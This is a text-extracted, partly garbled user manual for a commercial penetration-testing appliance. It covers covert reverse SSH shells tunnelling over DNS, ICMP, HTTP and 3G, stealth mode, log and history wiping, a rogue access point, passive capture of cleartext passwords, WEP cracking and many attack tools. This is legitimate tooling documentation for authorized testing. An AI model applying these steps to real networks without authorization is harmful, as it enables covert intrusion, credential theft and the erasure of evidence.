PX Enterprise Pentesting Appliance (PX-EPA) User Manual
Contents
1. opt pwnix pwnix scripts Disable_SSH_VPN sh Using the wireless hardware 802 11 wireless Copyright 2012 Pwnie Express 16 Connecting to an open wifi network 1 Set the wireless interface to managed mode iwconfig wlanO mode managed 2 Bring up the interface ifconfig wlanO up 3 Scan for access points in the area iwlist scan 4 Associate with an access point with SSID example on channel 6 iwconfig wlanO essid example iwconfig wlanO channel 6 5 Restart the interface ifconfig wlanO down ifconfig wlanO up 6 Acquire a DHCP address dhclient wland Running Airodump ng amp Kismet 1 Bring down the interface ifconfig wlanO down 2 To launch airodump ng airodump ng wlan0 Note The output of airodump ng can only be viewed within an SSH session no via serial console w When finished press CTRL C to exit 4 To launch Kismet kismet 5 Press ENTER 3 times then TAB then ENTER Copyright 2012 Pwnie Express 17 6 When finished press CTRL C to exit Tip Certain wireless tools may leave the wireless adapter in a mode that s not compatible with other wireless tools It s generally recommended to set the interface to a down state before running most wireless tools ifconfig wlanO down Packet injection amp WEP cracking 1 To run a simple packet injection test execute the following commands This example assumes a WEP enabled access point on channel 6 wi2. Verizon prepaid mobile broadband plans http www verizonwireless com b2c mobilebroadband page products _prepaidmb Insert the adapter into a Windows computer XP recommended The adapter will load a virtual CD ROM device open this device through My Computer and launch the Broadband2Go Virgin Mobile or VZaccess Verizon installer Copyright 2012 Pwnie Express 22 2 Once the installer completes launch Broadband2Go Virgin Mobile or VZaccess Manager Verizon and complete USB device detection 3 Verify the USB adapter is detected and a 1x data signal is available then click Connect 4 You will be prompted to activate the device and sign up for new service Complete the activation process by following the prompts 5 Once activated confirm you are able to access the Internet using the 3G adapter on Windows 6 Connect the adapter to the Enterprise Appliance s USB port and wait 30 seconds for the adapter driver to load Connecting to the Internet via 3G 1 Call the appropriate pppd dialup script For the unlocked GSM adapter pppd nodetach call e160 amp For the Verizon Virgin Mobile adapters pppd nodetach call l1xevdo amp For the T mobile Rocket 4G adapter pppd nodetach call tmobile amp 2 Assuming a 3G cellular data signal is available the adapter will establish an Internet connection within 10 20 seconds Once connected you will see a solid LED on the top of the adapter 3 Optional
3. SSH Egress Buster ssh pwnie localhost p 3334 SSH over DNS ssh pwnie localhost p 3335 SSH over SSL ssh pwnie localhost p 3336 SSH over 4G GSM ssh pwnie localhost p 3337 SSH over HTTP ssh pwnie localhost p 3338 SSH over ICMP ssh pwnie localhost p 3339 ve ee Enter your Enterprise Appliance pwnie SSH user password and voila You re now remotely connected to the appliance through the reverse shell Proceed to Deploying to target network Standard SSH SSH Egress Buster Note If there s no firewall between the Enterprise Appliance and your shell receiver system be sure the shell receiver system SSH server is listening on the ports you selected for the Standard Reverse SSH and SSH Egress Buster shells in the UI For example if you set port 31337 for Standard Reverse SSH add the line Port 31337 to etc ssh sshd_config then restart SSHd etc init d ssh restart Tip The SSH receiver address can be anonymized using the Tor Hidden Service feature as described here http www securitygeneration com security reverse ssh over tor on the pwnie express Special thanks to Sebastien J of Security Generation for streamlining the SSH receiver setup process and to Lance Honer for his resilient autossh script improvements Deploying to target network Copyright 2012 Pwnie Express 13 P Pwn Plug on SSH receiver f target network Backtrack N Z al Firewall on Firewall in front target network of
4. While enabled the Enterprise Appliance will passively listen on ethO recording HTTP requests user agents cookies OS guesses and clear text passwords to the following logs HTTP requests var log pwnix passive_recon http log OS guesses var log pwnix passive_recon pOf log Clear text passwords var log pwnix passive_recon dsniff log Tip Passive Recon is most effective when the Enterprise Appliance is in NAC Bypass transparent bridging mode or when connected to a switch monitor port or network tap Tip The Passive recon service can also be enabled disabled from the command line as follows To enable service pwnix_passive_recon start update rc d pwnix_passive_recon defaults To disable service pwnix_passive_recon stop update rc d f pwnix_passive_ recon remove Evil AP 1 Ensure the wireless antenna is connected to the appliance Copyright 2012 Pwnie Express 8 ON OS Click Services on the top menu Click Evil AP Enter an SSID for your Evil AP then click Start Evil AP Wireless clients will begin connecting to the AP either automatically via preferred network lists or by direct AP association Tip To view realtime Evil AP activity from the command line tail f var log pwnix evilap log By default the device will function as a standard AP transparently routing all client Internet requests through the wired interface ethO Tip The Evil AP service can also be enabled disab
5. SSH access to your target network http pwnieexpress com pages our tech Tunnels through application aware firewalls amp IPS Supports HTTP proxies SSH VPN amp OpenVPN 13 14 Sends email SMS alerts when SSH tunnels are activated Preloaded with Ubuntu Server 12 04 LTS Metasploit SET Fast Track w3af Kismet Aircrack SSLstrip nmap Hydra dsniff Scapy Ettercap Bluetooth VoIP IPv6 tools amp many more http pwnieexpress com pages our tech Unpingable and no listening ports in stealth mode Base hardware specs QO N O oe he Intel dual core i5 processor with HT 4 cores total at 2 66 GHz 8GB DDR3 memory 60GB internal solid state storage Onboard high gain 802 11 a b g n wireless supporting packet injection amp monitor mode Onboard high gain Bluetooth up to 1000 range supporting packet injection amp monitor mode Onboard 6 band worldwide 4G GSM cellular data Optional support for Zigbee Zwave RFID and Software Defined Radios SDR Optional physical tamper detection using an internal 6 axis accelerometer Getting started D OAO N Connect the provided wireless antenna to the SMA jack on the rear of the appliance Connect the appliance to a power source Connect the onboard Ethernet jack to a local network or switch Power up the appliance oval button on front panel The default appliance IP address is 192 168 9 10 netmask 255 255 255 0 To access the appliance for the first time configure yo
6. SSH receiver 1 Place your shell receiver system behind a public facing firewall 2 Configure the appropriate port forwarders on your firewall 1 Standard Reverse SSH Forward the port selected in the UI to port 22 of your shell receiver 2 SSH over HTTP Forward port 80 to port 80 of your shell receiver system 3 SSH over SSL Forward port 443 to port 443 of your shell receiver system 4 SSH over DNS Forward UDP port 53 to UDP port 53 of your shell receiver system 5 SSH over ICMP Requires your shell receiver system to be directly connected to the Internet no firewall 6 SSH over 3G Forward the port selected in the UI to port 22 of your shell receiver system 7 SSH Egress Buster Forward all ports selected in the UI to port 22 of your shell receiver system 1 In the Pwnix UI Reverse Shells page configure the reverse shells to connect to your firewall s public IP address or DNS name if available 2 Optional Enable Stealth Mode 3 You can now deploy the Enterprise Appliance to your target network The Enterprise Appliance will automatically phone home to your shell receiver system providing encrypted remote access to your target network Tip In some environments you may wish to schedule a nightly reboot of the device to re initiate all connections from the device side This way if some part of the connection process crashes on the device side for example sshd the connection process will
7. filesystem disk usage note your disk usage may vary df h Show CPU details cat proc cpuinfo Show total memory grep MemTotal proc meminfo Show current ethO config ifconfig eth0 Show currently listening TCP UDP services note dhclient won t be present if not using DHCP netstat Lntup Check syslog for errors warnings etc egrep i warn fail crit error bad unable var log messages Show Ruby version ruby v Show Perl version perl v Show Python version python V Copyright 2012 Pwnie Express 32 Additional Pentesting Resources 1 PTES _http Awww pentest standard org index php PTES_Technical_Guidelines 2 Analysis of Metasploit relative to PTES htto Avww tinyurl com msf ptes How to get support 1 Pwnie Express Support Portal http www pwnieexpress com support html 2 Pwnie Express Community Support Forum http forum pwnieexpress com 3 Pwnie Express support e mail support pwnieexpress com Copyright 2012 Pwnie Express 33
8. ports 80 and 443 for the update to succeed 3 The latest stable Pwnix release is downloaded and applied typically 3 5 minutes You will be redirected to the update log 4 The Pwnix version can be viewed under the System Details tab 5 The Pwnix Update log can be view under the System Details tab Appliance Reboot 1 Click Setup on the top menu 2 Under Restart Device click the Reboot Now button 3 The device will reboot immediately Services tab Metasploit RPC 1 Click Services on the top menu 2 Click Metasploit RPC then Enable Metasploit RPC 3 When enabled the Metasploit RPC service can be accessed through the RPC listener Copyright 2012 Pwnie Express Tip The Metasploit RPC service can also be enabled disabled from the command line as follows To enable service pwnix_msfrpcd start update rc d pwnix_msfrpcd defaults To disable service pwnix_msfrpcd stop update rc d f pwnix_msfrpcd remove Tip The Metasploit RPC service can configured in opt pwnix pwnix config services msfrpcd conf LISTEN This option configures the listen address Defaults to 127 0 0 1 USERNAME This option configures the username Defaults to pwnie PASSWORD This option configures the msfrpcd password Defaults to a random string Passive Recon EONS N Click Services on the top menu Click Passive Recon Click Enable to start the passive recon service
9. process closes listening UDP port 68 killall dhclient 2 Randomize your MAC address macchanger r eth 3 Disable ARP replies careful this may affect network connectivity ifconfig ethO arp 1 To disable stealth mode service pwnix_stealth stop update rc d f pwnix_stealth remove Adding unsupported software from the Ubuntu repositories The EPA has been designed as a network appliance and packages and software not installed by a Pwnie Express update are not supported on the device However root access to the device is provided and you can install additional software as needed during testing To do so you will need to enable the Ubuntu repositories Copy the appropriate sources list to the etc apt folder with the following command cp opt pwnix chef cookbooks pwnix base cookbook files default config_files sources list all enabled etc apt sources list apt get update apt get install lt software package gt Note that you should copy the appropriate configuration file back when your installation is completed or the Pwnix update process could break To do so cp opt pwnix chef cookbooks pwnix base cookbook files default config_files sources list all disabled etc apt sources list apt get update Reviewing the OS environment 1 Show Enterprise Appliance software revision Copyright 2012 Pwnie Express 31 grep Release etc motd Show kernel version uname r Show date time date Show
10. the ethO link To set a static IP for ethO enter a new IP address network mask default gateway and primary DNS server and click Apply static IP settings Note After the appliance s IP address is changed reconnect to the UI using the newly assigned IP address To acquire the ethO network settings from a DHCP server instead recommended click Switch to DHCP Note After switching to DHCP you ll need to access the appliance via the virtual default interface 192 168 9 10 or via local keyboard monitor to determine the new IP address assigned by DHCP Once the new DHCP assigned IP address is known reconnect to the UI using the newly assigned IP address Note The virtual default interface 192 168 9 10 can be shut down by running the following command ifdown eth0 1 Copyright 2012 Pwnie Express 6 Clear History amp Logs 1 Click Setup on the top menu 2 Under Clean up Pwnix History and Logs click the Cleanup now button 3 This clears the root user s bash history UI logs and all logs in var log Note The bash history for any currently active root user sessions will be cleared at next logout Tip The cleanup script can also be invoked from the command line as follows opt pwnix pwnix scripts cleanup sh Appliance Updates 1 Click Setup on the top menu 2 Under Update Device click the Update Now button Note The appliance must have Internet access via
11. FANIE CA FTE d Copyright 2012 Rapid Focus Security LLC DBA Pwnie Express Manual revision 03 27 2013 PX Enterprise Pentesting Appliance PX EPA User Manual Note The online version of this manual is maintained here http www pwnieexpress com support html Table of Contents Introduction Legal stuff Appliance Features Base hardware specs Getting started Using the Pwnix Ul Accessing Pwnix UI Setup tab Change Pwnix Password Reverse Shell Key Network Config Clear History amp Logs Appliance Updates Appliance Reboot Services tab Metasploit RPC Passive Recon Evil AP Reverse Shells tab System Details tab Using the reverse shells Reverse shell overview Typical deployment scenario Activating the reverse shells Configuring the Pwnix Shell Receiver VM to receive the reverse shells Configuring Backtrack to receive the reverse shells optional Connecting to the reverse shells Deploying to target network Using SSH port forwarders on Backtrack Example 1 Connecting to remote RDP servers Copyright 2012 Pwnie Express 1 Example 2 Connecting to remote web servers Creating an SSH VPN Sample environment Activating the SSH VPN tunnel Using the wireless hardware 802 11 wireless Connecting to an open wifi network Running Airodump ng amp Kismet Packet injection amp WEP cracking Wireless client de authentication Karmetasploit Bluetooth Using the Bluetooth adap
12. Reset the default route to use the 3G interface ppp0O route del default route add default pppd 4 Test 3G Internet connectivity ping google com traceroute google com 5 To close the 3G connection and restore Internet connectivity on ethO killall s SIGHUP pppd ifdown ethO amp amp ifup eth0d Using the SSH over 3G shell Copyright 2012 Pwnie Express 23 The SSH over 3G reverse shell provides secure out of band access to your Enterprise Appliance wherever a 3G cellular data signal is available While this bypasses your target network s perimeter a reverse shell is still recommended many cell carriers do not assign public IP addresses to 3G data access devices SSH receiver Backtrack 3G NU Z Pwn Plug on target network So St eee 10 Firewall in front of SSH receiver If you haven t done so already complete the reverse shell setup steps see Activating the reverse shells and Configuring the SSH receiver In the Reverse Shells page in UI enable the SSH over 3G GSM shell Configure the shell to connect to your firewall s public IP address or DNS name if available Enter the destination port you d like the Enterprise Appliance to use for the SSH connection Select your 3G adapter from the drop down list Click the Configure all shells button Configure your firewall to forward the port selected in the UI to port 22 on your Backtrack machine On the Backtra
13. VM to receive the reverse shells 1 Option 2 Use Backtrack 5 to receive the reverse shells Configuring Backtrack to receive the reverse shells 3 Test the reverse shells in a lab local LAN to confirm all shells are working as expected see Connecting to the reverse shells 4 Optional Enable Stealth Mode see Maintaining the Appliance gt Stealth Mode 5 Deploy the Enterprise Appliance to your target network and watch your SSH receiver for incoming shells see Deploying to target network i y Pwn Plug on target network Firewall on target network SSH Receiver Backtrack Activating the reverse shells 1 Log into the Pwnix UI 2 Click Reverse Shells on the top menu 3 Use the checkboxes to indicate the reverse shells you d like to enable Tip To best maintain persistent remote access enable all of the reverse shells 4 Enter the SSH shell receiver IP address or DNS name for each selected reverse shell The appliance will connect to this shell receiver system to establish the reverse shell connections Copyright 2012 Pwnie Express 10 5 6 8 Choose how often each reverse shell connection should be attempted By default a shell connection will be attempted every minute recommended To use an HTTP proxy for the SSH over HTTP Tunnel enable the Use HTTP Proxy checkbox and enter the proxy server address and port and optionally proxy server credentials Not
14. both open source and proprietary software Proprietary software is distributed under the terms of the Rapid Focus Security EULA http pwnieexpress com pdfs RFSEULA pdf The following software applications are governed by the bsd 3 clause license http www opensource org licenses bsd 3 clause autossh darkstat dsniff wepbuster wpa_supplicant metasploit The openssl ssleay software applications are governed by the openssl toolkit dual license http www openssl org source license html All other open source software is governed by the GNU General Public License http www gnu org licenses gpl html Appliance Features ee eel ey el Enterprise class wall mountable small form factor enclosure Supports Nessus server Metasploit Express Pro and Cobalt Strike Supports Backtrack Qualys Acunetix nCircle etc as virtual guest machines Hardened per NSA NIST DoD and DISA guidelines including encrypted volumes for pentest results Simple web based administration with Pwnix UI http pwnieexpress com pages our tech Includes most Pwn Plug features http pwnieexpress com pages pwn plug software release 1 1 One click Evil AP stealth mode passive recon and history wipe Fully automated NAC 802 1x RADIUS bypass http pwnieexpress com pages our tech Out of band SSH access over 4G GSM cell networks Copyright 2012 Pwnie Express 3 10 11 12 15 Maintains persistent covert encrypted
15. ck SSH receiver watch for the inbound SSH over 3G connection watch d netstat lntup4 grep 3337 Once the connection appears connect to the Enterprise Appliance as shown ssh pwnie localhost p 3337 Enter your Enterprise Appliance pwnie SSH user password and voila You re now remotely connected to the appliance through the reverse shell over 3G Note The 3G connection will be released and reconnected at the selected retry interval until a reverse SSH tunnel is established Zigbee Travis Using the Goodfet utilities Goodspeed s Zigbee utilities are located in pentest goodfet Simply connect a compatible Zigbee hardware radio running the Goodfet firmware to the Enterprise Appliance via USB and use these utilities for Zigbee wireless auditing Copyright 2012 Pwnie Express 24 For more information see http goodfet sourceforge net Network penetration testing with the PX EPA Footprinting Use whois to identify companies domains ips and other target information whois lt company name gt whois lt ip address gt Use traceroute to identify hosts and path information traceroute lt host gt Use dig to find DNS information dig lt DNS domain name gt Use Fierce to identify additional entities via DNS cd pentest fierce fierce pl dns lt domain gt wide ztstop wildcstop Discovery amp Scanning Use arp scan to identify nearby hosts arp scan local net Use nmap to id
16. e run Start Metasploit with the karma script msfconsole r karma rc Note The module loading is CPU intensive and can take 1 minutes to complete Tip To redirect all DNS queries to the local Metasploit FakeDNS listener iptables t nat A PREROUTING p udp destination port 53 j REDIRECT to port 53 Bluetooth Special thanks to JP Ronin hackfromacave com for getting all of this working for us Using the Bluetooth adapter 1 Confirm the output of the following commands lsusb Bus 001 Device 002 ID 0a12 0001 Cambridge Silicon Radio Ltd Bluetooth Dongle HCI mode hciconfig hci0 Type BR EDR Bus USB BD Address XX XX XX XX XX XX ACL MTU 310 10 SCO MTU 64 8 Copyright 2012 Pwnie Express 19 DOWN RX bytes 466 acl 0 sco 0 events 18 errors 0 TX bytes 73 acl 0 sco 0 commands 17 errors 0 1 Enable the Bluetooth interface and set it to Non Discoverable hciconfig hciO up hciconfig hci0 noscan 2 Toscan for local Bluetooth devices hcitool i hci scan flush info class 1 To ping the address of a local Bluetooth device l2ping i hciO XX XX XX XX XX XX 2 To dump Bluetooth packets hcidump i hciO t X 3 To pair with a local Bluetooth device bluez simple agent hciO0 XX XX XX XX XX XX Accessing additional Bluetooth tools 2test bss bluebugger bluelog h psm_scan rfcomm_scan carwhisperer redfang h ussp push sobexsrv h 4G GSM cellu
17. e The HTTP proxy auth password is stored in clear text in opt pwnix pwnix scripts script_configs Click Configure all shells at the bottom of the page to apply your changes Note The following SSH client config directives etc ssh ssh_config are set on all devices to allow for automation of reverse shell connections Be sure you understand the security implications of these settings before connecting to other SSH servers from the device StrictHostKeyChecking no UserKnownHostsFile dev null Proceed to configure your shell receiver Configuring the Pwnix Shell Receiver VM to receive the reverse shells The Pwnix Shell Receiver virtual machine is the recommended SSH shell receiver This is a locked down Ubuntu 12 04 system pre configured to receive all reverse shells The Enterprise Appliance will connect to this system when initiating the reverse shell connections 1 2 nia Start up the Pwnix Shell Receiver virtual machine if it s not already running From your local workstation open a browser and connect to the Enterprise Appliance UI https appliance_ip_address 8443 Login to the UI when prompted Click Reverse Shells on the top menu Click the Generate Pwnix Shell Reciever config link at the top of the page under step 5 to download the pwnix_receiver sh script to your local workstation Copy the script file pwnix_receiver sh to the Pwnix Shell Receiver virtual machine via scp scp pwnix_receive
18. entify hosts and services nmap A lt ip address or range gt Use the nmap scripts to identify additional information nmap sC lt ip address or range gt Pentesting tools on the PX EPA Configuring and Running Metasploit Using Metasploit via msfconsole The Metasploit binaries msfconsole msfcli etc can be run from any directory Simply type msfconsole run the local Metasploit Console The Metasploit binaries can be found in opt metasploit msf3 Using Metasploit via msfrpcd The metasploit service can by editing the file opt pwnix pwnix config services msfprcd conf Copyright 2012 Pwnie Express 25 nano opt pwnix pwnix config services msfrpcd conf The metasploit service can be started by running service pwnix_msfrpc start To use metasploit from a remote host you will need a front end application We suggest using Backtrack for this Log into Backtrack with your credentials and run the following from the commandline startx cd opt metasploit diagnostic_shell msf3 msfgui Using the credentials provided on the https epa 8443 services msfrpcd page or in opt pwnix pwnix config services msfprcd conf log into MsfGui Tip You may have to open msfgui more than once to get it to prompt you for a server By default it starts an msfrpcd instance on the local Backtrack system Running The Social Engineering Toolkit SET 1 To launch SET type cd pentest set amp amp set Runnin
19. et Login to the Backtrack system and open Firefox Connect to the UI https fappliance_ip_address 8443 Login to the UI when prompted Click Reverse Shells on the top menu Click the Generate Backtrack config link at the top of the page under step 5 to download the backtrack_receiver sh script Save the script file backtrack_receiver sh into the root user s home directory selected by default Open a terminal window and enter the following commands cd chmod x backtrack_receiver sh backtrack_receiver sh The script auto configures and starts the reverse shell listeners on Backtrack When prompted enter the desired certificate information for the stunnel SSL certificate or just press ENTER to accept the defaults Once the auto config script completes you will see Copyright 2012 Pwnie Express 12 Setup Complete Press ENTER to listen for incoming connections 12 Press ENTER to watch for incoming Enterprise Appliance connections Each reverse shell will attempt to connect using the interval you specified in the UI Tip You can list all active device connections at any time by typing netstat lntup4 grep 333 13 Proceed to Connecting to the reverse shells Connecting to the reverse shells 1 Open a terminal window on your shell receiver system and connect to any available listening Enterprise Appliance shell as follows Standard SSH ssh pwnie localhost p 3333
20. g FastTrack 1 To launch Fasttrack type cd pentest fasttrack amp amp fast track py i Note Fasttrack s autopwn is incompatible with Metasploit 3 7 due to removal of sqlite support http dev metasploit com redmine issues 4399 Running the tools in pentest perl pentest asp auditor asp audit pl perl pentest bed bed pl cd pentest cisco auditing tool amp amp CAT perl pentest cisco global exploiter cge pl perl pentest cms explorer cms explorer pl python pentest darkmysqli DarkMySQLi py perl pentest dnsenum dnsenum pl pentest easy creds easy creds sh perl pentest fierce fierce pl Copyright 2012 Pwnie Express 26 python pentest fimap fimap py pentest goohost goohost sh python pentest grabber grabber py pentest Ibd Ibd sh python pentest metagoofil metagoofil py python pentest miranda miranda py h python pentest plecost plecost 0 2 2 9 beta py python pentest sickfuzz sickfuzz py python pentest sipvicious svmap py h perl pentest smtp user enum smtp user enum pl perl pentest snmpcheck snmpcheck 1 8 pl perl pentest snmpenum snmpenum pl python pentest sqlbrute sqlbrute py perl pentest sqlninja sqlninja cd pentest sslstrip amp amp ssistrip py python pentest theharvester theHarvester py python pentest ua tester UAtester py cd pentest voiper amp amp python fuzzer py python pentest waffit wafwOOf py cd pentest
21. lar IMPORTANT Make sure to place the cellular adapter in the back group of 4 USB ports when looking at the device from the back The other USB ports may not provide enough power for the 4G card Copyright 2012 Pwnie Express 20 Using the unlocked GSM adapter The unlocked GSM adapter supports five GSM cell bands HSDPA GSM UMTS EDGE GPRS and is compatible with AT amp T Vodafone Orange and GSM carriers in over 160 countries on GSM carriers in the Americas http en wikipedia org wiki List_of mobile network operators of the Americas GSM carriers in Europe http en wikipedia org wiki List_of mobile network operators of Europe Note Verizon Sprint Virgin Mobile and other CDMA carrier SIMs will not work in the unlocked GSM adapter First obtain a SIM card from the GSM cell provider of your choice In the US SIM cards from AT amp T devices including iPhones are supported Note The mobile service attached to the SIM card must have mobile broadband data service Verify you can access the Internet from your phone using the SIM card before proceeding Slide open the the plastic cover on the GSM adapter Insert your SIM card into the adapter with the notch positioned as shown by the line drawing on the SIM slot with the SIM card contacts facing down Note Some GSM phones including the iPhone4 use a micro SIM instead of a standard sized SIM card To fit these SIM cards into the GSM adapter use the incl
22. led from the command line as follows To enable service pwnix_evil_ap start update rc d pwnix_evil_ap defaults To disable service pwnix_evil_ap stop update rc d f pwnix_evil_ap remove Tip The Metasploit RPC service can configured in opt pwnix pwnix config services evil_ap conf Reverse Shells tab See section Using the reverse shells for details on this feature System Details tab This section displays the appliance s software release level system logs disk usage etc Using the reverse shells 1 Reverse shell overview All Pwnix devices include aggressive reverse tunneling capabilities for persistent remote SSH access Copyright 2012 Pwnie Express 9 2 SSH over HTTP DNS ICMP and other covert tunneling options are available for traversing strict firewall rules web filters amp application aware IPS 3 All tunnels are encrypted via SSH and will maintain access wherever the device has an Internet connection including wired wireless and 3G GSM where available Typical deployment scenario 1 On your staging lab network enable the desired reverse shells see Activating the reverse shells 2 Select the platform you d like to use to receive the reverse shells the shell receiver 1 Option 1 recommended The Pwnix Shell Receiver virtual machine This is a locked down Ubuntu 12 04 system preconfigured to receive all reverse shells see Configuring the Pwnix Shell Receiver
23. nix pwnix scripts encrypted_volume_setup sh Enter a desired passphrase for the encrypted partition Answer yes when prompted these prompts are expected when first encrypting a partition Copy a test file to the encrypted partition echo test gt opt pwnix crypt store test file Unmount the encrypted partition and very the contents of your test file is unreadable umount opt pwnix crypt store cat opt pwnix crypt store test file To re mount the encrypted partition enter your passphrase when prompted mount t ecryptfs opt pwnix crypt store opt pwnix crypt store Using Stealth Mode Important Enabling stealth mode will prevent access direct access to the Enterprise Appliance s SSH server and UI Once stealth mode is enabled and the device is rebooted access to the device can only be obtained through a reverse shell or via locally attached keyboard monitor 1 To enable stealth mode service pwnix_stealth start update rc d pwnix_stealth defaults While enabled stealth mode does the following Disables IPv6 support prevents noisy IPv6 broadcasting Copyright 2012 Pwnie Express 30 Disables ICMP replies won t respond to ping requests Disables the UI closes port 8443 Sets the local SSH server to listen on the loopback address only closes port 22 to the outside Still allows ALL reverse shells to function as expected Oo E 1 For additional stealthiness 1 If using DHCP kill the dhclient
24. ote Desktop client etc Sample environment The steps below assumes the following IP addresses ranges Substitute the addresses ranges for your target and local Backtrack networks where appropriate Copyright 2012 Pwnie Express 15 Target network where the Enterprise Appliance is deployed 172 16 1 0 24 Local network where Backtrack SSH receiver is located 192 168 1 0 24 VPN network 10 1 1 0 30 Backtrack VPN address tunO interface 10 1 1 1 Enterprise Appliance VPN address tunO interface 10 1 1 2 Assumes a reverse shell is currently established and listening on localhost 3333 Standard Reverse SSH Any active reverse shell can be used to carry the VPN tunnel change 3333 where appropriate OE ON Eo NS Activating the SSH VPN tunnel 1 On Backtrack VPN client ssh f w 0 0 localhost p 3333 true Login to the Enterprise Appliance as root when prompted ifconfig tunO 10 1 1 1 10 1 1 2 netmask 255 255 255 252 route add net 172 16 1 0 24 gw 10 1 1 2 2 On the Enterprise Appliance VPN server opt pwnix pwnix scripts Enable_SSH_VPN sh 3 The SSH VPN tunnel should now be active 4 On Backtrack test connectivity to target network through the VPN tunnel ping 10 1 1 2 ping 172 16 1 1 or any remote machine on the target network nmap sP 172 16 1 5 To disable the VPN tunnel on the Backtrack side ifconfig tunO down 6 To disable the VPN tunnel on the Enterprise Appliance side
25. package from http www tenable com products nessus nessus download agreement 2 Install the Nessus deb package and start the Nessus server dpkg i Nessus 5 0 1 ubuntu1110_amd64 deb service nessusd start 3 Connect to the Nessus server web UI https appliance_IP 8834 4 Proceed through the Nessus server setup wizard Deploying virtual machines Creating a Backtrack 5 VM 1 Download the Backtrack 5 ISO to opt pwnix virtual machines 2 For this example we ll assume the ISO file name is BT5R1 GNOME 32 iso 3 Run the following commands to create a new virtual machine that boots from the BT5 ISO chmod 644 opt pwnix virtual machines BT5R1 GNOME 32 iso virt install n bt5r1 r 512 disk path opt pwnix virtual machines bt5 img bus virtio size 6 c opt pwnix virtual machines BT5R1 GNOME 32 iso accelerate network network default model virtio connect qemu system vnc noautoconsole v 4 View the current state of the new VM virsh c qemu system list Copyright 2012 Pwnie Express 29 o From a remote system with a GUI install virt viewer for example via apt get or yum Remotely connect to the Backtrack VM GUI console virt viewer c qemu ssh pwnie appliance_IP system bt5r1 Note Remote GUI connections require key based SSH access to the appliance Setting up an encrypted partition w Run the following script to create an encrypted partition at opt pwnix crypt store opt pw
26. pwnie user The Pwnix UI will restart then prompt you for the new credentials Tip You can also set the pwnie user s password via the command line as shown passwd pwnie Reverse Shell Key Copyright 2012 Pwnie Express 5 PIO No Click Setup on the top menu Click Reverse Shell Key This section shows the current root user SSH key used to establish the reverse shells Optional To generate a new key pair for the reverse shells click Generate Tip If a key pair doesn t already exist a new one will be automated generated after enabling one or more reverse shells on the Reverse Shells page Network Config 1 Click Setup on the top menu 2 Click Network Config 3 The current network settings for the appliance s onboard Ethernet interfaces are displayed under E eS Current Network Settings By default the appliance ships with the following interfaces ethO The onboard Ethernet interface configured for DHCP eth0O 1 The virtual default interface for initial access set to 192 168 9 10 24 wlanO The onboard 802 11a b n g wireless adapter DOWN by default virbrO The default bridging interface for virtual machines To change the appliance s host name enter a new hostname and click Change hostname Tip After changing the hostname log out of any active terminal sessions to update your terminal prompt To change the IP configuration for ethO click
27. r sh pwnie Pwnix_Shell_Receiver_IP_address Login to the Pwnix Shell Receiver virtual machine ssh pwnie Pwnix_Shell_Receiver_IP_address Enter the following commands chmod x pwnix_receiver sh sudo pwnix_receiver sh Copyright 2012 Pwnie Express 11 11 12 13 The script auto configures and starts the reverse shell listeners on the Pwnix Shell Receiver If prompted enter the desired certificate information for the stunnel SSL certificate or just press ENTER to accept the defaults Once the auto config script completes you will see Setup Complete Press ENTER to listen for incoming connections Press ENTER to watch for incoming Enterprise Appliance connections Each reverse shell will attempt to connect using the interval you specified in the UI Tip You can list all active device connections at any time by typing sudo netstat Lntup4 grep 333 Proceed to Connecting to the reverse shells Configuring Backtrack to receive the reverse shells optional A Backtrack 5 system can also serve as the SSH tunnel receiver The Enterprise Appliance will connect to this system when initiating the reverse shell connections Note These steps assume you re using Backtrack 5 as your SSH receiver Older Backtrack distributions may be used but different steps may apply DLO SS D 9 10 11 Place the Enterprise Appliance and the Backtrack system on the same local network subn
28. start fresh again after the reboot Copyright 2012 Pwnie Express 14 Using SSH port forwarders on Backtrack Example 1 Connecting to remote RDP servers 1 On Backtrack ssh pwnie localhost p XXXX NL 3389 XXX XXX XXX XXX 3389 where XXXX is the local listening port of an active reverse shell such as 3333 for standard reverse SSH and where xxx xxx xxx xxx is the IP address of an RDP target system on the remote network the Enterprise Appliance is physically connected to Login to the Enterprise Appliance when prompted Connect to the remote RDP server through the SSH tunnel by using localhost rdesktop localhost Example 2 Connecting to remote web servers oN On Backtrack ssh pwnie localhost p XXXX ND 8080 where XXXxX is the local listening port of an active reverse shell such as 3333 for standard reverse SSH Login to the Enterprise Appliance when prompted Open Firefox and configure it to use localhost as an HTTP proxy on port 8080 You can now connect to any web server on the remote network by entering the IP address or URL into Firefox Creating an SSH VPN The OpenSSH server on the Enterprise Appliance supports SSH based VPN tunnelling through any active reverse shell allowing transparent albeit slow access to your target network from your Backtrack machine This is mainly useful when the need arises for a GUI based or third party pentesting tool such as BurpSuite Nessus Rem
29. ter Accessing additional Bluetooth tools 4G GSM cellular Using the unlocked GSM adapter Activating the Virgin Mobile Verizon adapters Connecting to the Internet via 3G Using the SSH over 3G shell Zigbee Using the Goodfet utilities Network penetration testing with the PX EPA Footprinting Discovery amp Scanning Pentesting tools on the PX EPA Configuring and Running Metasploit Running The Social Engineering Toolkit SET Running FastTrack Running the tools in pentest Running tools installed via aptitude Additional features Installing Tenable Nessus Server Deploying virtual machines Creating a Backtrack 5 VM Setting up an encrypted partition Using Stealth Mode Adding unsupported software from the Ubuntu repositories Reviewing the OS environment Additional Pentesting Resources How to get support Copyright 2012 Pwnie Express 2 Introduction Legal stuff All Pwnie Express Rapid Focus Security products are for legally authorized uses only By using this product you agree to the terms of the Rapid Focus Security EULA http pwnieexpress com pdfs RFSEULA pdf As with any software application any downloads transfers of this software are subject to export controls under the U S Commerce Department s Export Administration Regulations EAR By using this software you certify your complete understanding of and compliance with these regulations This product contains
